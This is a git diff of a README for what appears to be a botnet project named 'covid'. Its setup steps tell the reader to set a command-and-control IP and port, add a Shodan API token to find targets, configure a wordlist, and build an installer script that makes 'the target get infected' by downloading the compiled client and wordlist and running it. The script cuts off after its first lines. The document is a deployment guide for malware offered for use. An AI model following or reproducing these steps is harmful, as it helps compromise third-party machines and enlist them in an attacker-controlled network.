MrScytheLULZ/covid/README.md

 1. download the project

-2. configure the cnc_ip on client.py and server.py
+2. configure the cnc ip and cnc port on client.py and server.py

 3. add shodan api token

+4. configure the wordlist in client.py and configure the wordlist length in server.py

-4. create an installation file to make the target get infected and configure it on server.py and client.py for example:
+5. create an installation file to make the target get infected and configure it on server.py and client.py for example:

-use a python compiler to compile client.py then create the bash script that downloads the compiled file and runs it:
+use a python compiler to compile client.py

+then create a bash script that downloads the used wordlist, the compiled client and runs the client:
 ```
 #!/bin/bash
 cnc_ip="your cnc"